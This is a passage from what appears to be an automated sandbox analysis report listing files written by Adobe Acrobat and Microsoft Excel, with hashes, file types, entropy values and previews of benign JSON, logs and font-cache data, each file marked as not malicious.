DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):286
                            Entropy (8bit):5.259733113179705
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJfshHHrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGUUUkee9
                            MD5:C424531B08A96806326C79E2D28568FC
                            SHA1:DBBDE72A410457372F1B50367855653FF34945B0
                            SHA-256:4D8FEF02D3F099EEAF510234C51DFA3217043DFAF49EB17904ED172EF6032F16
                            SHA-512:F331A737E22194D23DBEBF94F755A80709D3538846C62E6115F5F3DAD935E074B19E90C3403C400D924B710BE974C33E178065050DF942B56BD65E843F770A6B
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.269189184576825
                            Encrypted:false
                            SSDEEP:6:YEQXJ2HXomN6+wINDOAEYK7+FIbRI6XVW7+0YJ7oAvJTqgFCrPeUkwRe9:YvXKXomN6+9N7EY5YpW7LGTq16Ukee9
                            MD5:BD37B250D185020FB85853804D4DFE3F
                            SHA1:7C88D579877030DD605CA4CC4099469B13463524
                            SHA-256:54387E2F31D5D175B769FB7940A5CE8C0BD9ABAABB03900CD213A57962A28497
                            SHA-512:9A72910C95CFD17C0F38603153707C8F53B21141443EAFB4F0A99C7A96582DA8512150B57313BD5A38ABEB17EF5A18108ABCE6A9F2D803E8503CB1DCF0F2253C
                            Malicious:false
                            Preview:{"analyticsData":{"responseGUID":"db999151-5099-4b74-b99d-284b06b5be27","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733985021377,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):0.8112781244591328
                            Encrypted:false
                            SSDEEP:3:e:e
                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                            Malicious:false
                            Preview:....
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):2814
                            Entropy (8bit):5.1279260179189246
                            Encrypted:false
                            SSDEEP:24:Y23IyS2YVhV2LSoGIF/aM09aymwZ15i5uiaBMqg/NHJk1JEryjrCj0Sqx9Ca4ZHi:YRlVXuw/5wuiKMq8ADXrUel4xth9I
                            MD5:758815C260A148024185CEEF4E8F2685
                            SHA1:94472374C34AE8167DCEF49C137157501B0F6C5F
                            SHA-256:0AC09C5F38DD5410DF5945A5F7F9BCF87F37DF99BF448C337F457139E996880B
                            SHA-512:D8BB5316F58CF9206CE2CC0AB19CCF7A2EC426C76DFEB88FC0B0C6DD72E0033B520C8E3BB2149072F3E43A5D4A8A3858620F4CD95482A79F2D9B2996D1C0AC2C
                            Malicious:false
                            Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"2a991c7ad6c34453bc58681fb536145c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1733809734000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"18deae4646178be9751dcec64e084d16","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1733809734000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"bee2b129c207b68838ff0d519e9280f8","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1733809731000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"30846590ea7b9124d0f4cfa951bcde58","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733809730000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"5579f5733200df187498f638fd67d08d","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733809730000},{"id":"DC_Reader_RHP_Retention","info":{"dg":"fcf39c421da9dea7b4a00c096cb9ab1e","sid":"DC_Reader_RHP_Retention"},"mimeType":"file","
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                            Category:dropped
                            Size (bytes):12288
                            Entropy (8bit):0.9857679293408087
                            Encrypted:false
                            SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpXQMZ4zJwtNBwtNbRZ6bRZ4YQMZF:TVl2GL7ms6ggOVpXh6zutYtp6Plh7
                            MD5:8A9116E455643DE3D5ACFBC8BE50A47A
                            SHA1:6A3713F9EB3F9431C51ACA9E52CDC02DEA2480F3
                            SHA-256:E08F94B11B8F9172F502D342627A5228A05F4379156F058D243144375517A1EC
                            SHA-512:1DC30C865F108578BDE1A0147D67A291E7DB325DB9D7D8278991D780DF67EBF3795D1CC1C67AA568A47643E00E062D233372AE1AF736855C93DDFA9AB91716C7
                            Malicious:false
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite Rollback Journal
                            Category:dropped
                            Size (bytes):8720
                            Entropy (8bit):1.3410048892843676
                            Encrypted:false
                            SSDEEP:24:7+tcnAD1RZKHs/Ds/SpXQMZPzJwtNBwtNbRZ6bRZWf1RZKwqLBx/XYKQvGJF7ure:7MUGgOVpXhhzutYtp6PMBqll2GL7msr
                            MD5:46E4CE2A9E1936DBFC48830AA09E019A
                            SHA1:94E031E62C9515F063E2728C3FC16C6D05204345
                            SHA-256:05C591A8642D931EE6BA98D4478DB1F9BF4CC11B851A1229B72512C15D681982
                            SHA-512:4BE1B997860C08DD0D969771CDF632700D54C546F08AFF45493734B154952CE0EBD97916178E4775ADD758458B0E8C0C3B23BCCD99AEC23CFA9691658CCB3A06
                            Malicious:false
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):66726
                            Entropy (8bit):5.392739213842091
                            Encrypted:false
                            SSDEEP:768:RNOpblrU6TBH44ADKZEg7MDjxYspEOnDckS1jKd/YGP0TaaYyu:6a6TZ44ADE7MDdoOnDG1Od/1uK
                            MD5:ADEF3C136A11AA6133A8FBE1C39EC2DC
                            SHA1:F2994674EB77ED5FEC3BD6780649025EA9ADD0C0
                            SHA-256:68CA413363A44D70339C961C8A0771A830A25E589477A509BB71A67E2B2751A5
                            SHA-512:A0C4C747A79FD2BE1E1ACE01E037B2150AFD7F2739A8F43A97AC2E19454EFA54B29C6C3DDCFD27E9176B2F3ED37D9A60B292AD1FB9C301218AD50EF21A35B0C0
                            Malicious:false
                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):794
                            Entropy (8bit):2.7142819241824805
                            Encrypted:false
                            SSDEEP:24:YIrNvpKAzLtwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLSc88AJtfJ52IHV
                            MD5:BD9E767E74B38030B097E6FED6464EB5
                            SHA1:03D9E758B4DB2B6E922BBBDE189C210AF676C648
                            SHA-256:4FCDC40B7579E1C625A21D9BD14B898D8854FE812BF76BB31D077E39E2FAF6B2
                            SHA-512:61FE087E54A696C70F69827B2136E8E34380F99FE5EFFB38392CF33C26D421B5ECF2A19EE041BD0BEC944412CCC6E8912DEFFBE15A0B77A20184F31BB6C794A5
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):98872
                            Entropy (8bit):2.668539610083046
                            Encrypted:false
                            SSDEEP:768:XO5J7vE1DE7ohzp66m6KOBToBqQbApQKyE:+OWE
                            MD5:93B3B49BD9024A98C8F941436CD53778
                            SHA1:05A4A8C5EEDA8C61B07FD886DA8B5ECEE7720EC4
                            SHA-256:4C00713FEDDF4D1AF8D0A8F9FB98F290975834F5DBAC2C9E98519ADC6D1BEAA4
                            SHA-512:325874EF76CB84DC303B37547CFD5B6BD134379A46AB55F76F790BF58C1F297ABEA179AE40EB4FF891462B813335B8A74FA517FDCBE85C39FC9E813D8A7DACC4
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):44256
                            Entropy (8bit):3.15066292565687
                            Encrypted:false
                            SSDEEP:384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
                            MD5:F1EC2E98B0F577B675156B13DCF94105
                            SHA1:4FF2D02051E92771FBB245BA8095C80148A0F61A
                            SHA-256:66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
                            SHA-512:6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):98872
                            Entropy (8bit):2.631925202654186
                            Encrypted:false
                            SSDEEP:768:XOD+vv1DW7ohBb66mQK4BTonrxQbApQKYE:+cjE
                            MD5:8D8E0F9D697D37EF3F1D4DD5418DB971
                            SHA1:E30A55D2E4131E15CF14E1A6B3B77AD4D682DBF8
                            SHA-256:E279B0BBE538F2E18DEEC9B764AF9CAE38522E9351D904E32B6EFE188B5298CF
                            SHA-512:B0F28B80296F03146093A7F319682B21846DA792EAA0C84C4B49AE2C2B8C383F2FF09C56B61A24831B24EC74E1B4C4E44E2D483892F98DC6798DB88D3CD3C2E9
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2563079623293435
                            Encrypted:false
                            SSDEEP:12:Yal/m/4sHoKnL8n/Ml/+B0n/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXl:Yemb2sZb
                            MD5:F4B0E1C03C7BB160B48CFFA6160E2CBA
                            SHA1:3B95941606219C0EAF5FDB78E67C7F10BF21390B
                            SHA-256:06FD47AFCD865FAAEEF47C91837DFE45A7F0EC9F67E233767F9A7386B00326F0
                            SHA-512:F44D02569287398C2F97F3FD0F302E58DAA66C646EAC3E05DE5CD6965A3F0E2C9A5446A89B237CE622FD5583937BE137E0FBD09E3ABF5FC7ADBE834CCF52A65F
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):99352
                            Entropy (8bit):2.668869758190582
                            Encrypted:false
                            SSDEEP:768:hOpAgv81D97ohP46ScVK4BTonhrQbApQKdE:UTeE
                            MD5:33F9E1A965F0A0D7C74DDD10AD599E6D
                            SHA1:A899900BF288BF09E9D8DF868E127529077A60C2
                            SHA-256:8A89E51B9DD7845727812445E4AB210883BDF82350D5B65445A8C7354E87CB0B
                            SHA-512:58F4EE56A13A7457F577D09F082B8EE52FAE4CABC9D59A134CF60C7C519A39BB6C0FA7F604FED42988597B8E02CE5C66F141C1CA99C01639FA0A7E2D1962E64E
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):44256
                            Entropy (8bit):3.147465798679962
                            Encrypted:false
                            SSDEEP:384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
                            MD5:36D8FF25D14E7E2FBB1968E952FF9C17
                            SHA1:E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
                            SHA-256:305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
                            SHA-512:B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):109544
                            Entropy (8bit):4.282675970330063
                            Encrypted:false
                            SSDEEP:768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
                            MD5:F7B9A8F20E64B2CB6B572BCBA5866236
                            SHA1:2F092A0A518639332BE76BF60DBB966AC331D356
                            SHA-256:72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
                            SHA-512:4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1293620
                            Entropy (8bit):4.563127917199792
                            Encrypted:false
                            SSDEEP:6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
                            MD5:F71C973B5E362DFD6408D6C009E5643E
                            SHA1:24B3CE67B31BFD4791287932206D54C73489424E
                            SHA-256:27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
                            SHA-512:4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):1452584
                            Entropy (8bit):0.2562954865265565
                            Encrypted:false
                            SSDEEP:12:Yal/KHCtn/Ml/+En/6iJJJKJJevhaJIJJTv192AriIIKqrR+d+Pg+rKXn+W17j+8:YelVs7b
                            MD5:42487ABC2F46BAC8A361E94FB27DFF93
                            SHA1:D84EF3D1DD26F753B5A639572B0F411560D3EFDF
                            SHA-256:464EAB4EB36C656E1F0825E1C9831AC431CFB2CE614D8EDFC9041CAB2627F776
                            SHA-512:9A461F0E3EFB1E30ECF28210A2EECF2B48DFD29A40DCA619B4B490C047182315046D6C0ED7C1ADD211E41D6CE033FF619D9E4FE142143B2527E58EA29B18DAED
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                            Category:dropped
                            Size (bytes):98872
                            Entropy (8bit):2.631925202654186
                            Encrypted:false
                            SSDEEP:768:XOD+vv1DW7ohBb66mQK4BTonrxQbApQKYE:+cjE
                            MD5:8D8E0F9D697D37EF3F1D4DD5418DB971
                            SHA1:E30A55D2E4131E15CF14E1A6B3B77AD4D682DBF8
                            SHA-256:E279B0BBE538F2E18DEEC9B764AF9CAE38522E9351D904E32B6EFE188B5298CF
                            SHA-512:B0F28B80296F03146093A7F319682B21846DA792EAA0C84C4B49AE2C2B8C383F2FF09C56B61A24831B24EC74E1B4C4E44E2D483892F98DC6798DB88D3CD3C2E9
                            Malicious:false
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):794
                            Entropy (8bit):2.7142819241824805
                            Encrypted:false
                            SSDEEP:24:YIrNvpKAzLtwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLSc88AJtfJ52IHV
                            MD5:BD9E767E74B38030B097E6FED6464EB5
                            SHA1:03D9E758B4DB2B6E922BBBDE189C210AF676C648
                            SHA-256:4FCDC40B7579E1C625A21D9BD14B898D8854FE812BF76BB31D077E39E2FAF6B2
                            SHA-512:61FE087E54A696C70F69827B2136E8E34380F99FE5EFFB38392CF33C26D421B5ECF2A19EE041BD0BEC944412CCC6E8912DEFFBE15A0B77A20184F31BB6C794A5
                            Malicious:false
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):246
                            Entropy (8bit):3.5065515051498046
                            Encrypted:false
                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8Er6Ow:Qw946cPbiOxDlbYnuRK4
                            MD5:873AE62E36BD7FB614F23695CDBFCE3F
                            SHA1:F8FAA139AF8AA625F42EFE45D05C516388BC661C
                            SHA-256:AF7E24EE8349095B8DBA7BD38D083AE346E43F7D0073A7345D49F0B3047A8034
                            SHA-512:E96D019906BEF53BCA31606AB2053A47196717065DB0C383FE6D61B9511C52DB4337E8F3B7A56EE8116C18A81415EFE47505D39FB9243CF02F3242039BF14F46
                            Malicious:false
                            Preview:Error 2711. The specified Feature name ('ARM') not found in Feature table. === Logging stopped: 10/12/2024  00:48:48 ===
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with very long lines (393)
                            Category:dropped
                            Size (bytes):16525
                            Entropy (8bit):5.376360055978702
                            Encrypted:false
                            SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                            MD5:1336667A75083BF81E2632FABAA88B67
                            SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                            SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                            SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                            Malicious:false
                            Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                            Category:dropped
                            Size (bytes):16605
                            Entropy (8bit):5.364697518770256
                            Encrypted:false
                            SSDEEP:384:oiWbWGewEiVtwdn5nT7S8biqJyIAh5Jz2hprl9Lqmf/bj9eUqmWHTyTybScWSZxE:qsJb
                            MD5:FD121802F7569BE5C6AA8A9B2F822DEE
                            SHA1:B8F9CA863BE2896ACB2BCAC953CB0C0C1E70F95E
                            SHA-256:97D91DD909532F063F94B5827ADF6ADA57048EC1E1F19D6C1A1347007C854BA8
                            SHA-512:5A4A3F5B2DD844868B56D2178C682BB4A473F38E2BE4E249898612A261243F69A4F36AEAE6D91981F0E4EB078177F9AAC542D81BF1752DCEB3C462B8DC4A1305
                            Malicious:false
                            Preview:SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:798-0500 ThreadID=7204 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:800-0500 ThreadID=7204 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:800-0500 ThreadID=7204 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:800-0500 ThreadID=7204 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=a9d500b1-3a62-4f2f-9dfd-412399ff13b3.1733809719798 Timestamp=2024-12-10T00:48:39:800-0500 ThreadID=7204 Component=ngl-lib_NglAppLib Description="SetConf
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):29845
                            Entropy (8bit):5.39636080228608
                            Encrypted:false
                            SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbp:B3
                            MD5:2FFB3542CF6978625FB16F5973BCB41B
                            SHA1:4C0C2568DD75F7FB322647DB6F972740A9C37565
                            SHA-256:E9966537CF9BF51875DF699225DBFAFE3B05110BD10C5B6C8C7FD717FBCBBED9
                            SHA-512:49AE2B8921F5760DF3B19253B165883FF9F9DF6EEE0F91CD1FBB10E6D30FF8312C1AD655DE73CC7ACEE9F98C8AE253BC26663DA0C52E28796B45D51D44A585D6
                            Malicious:false
                            Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
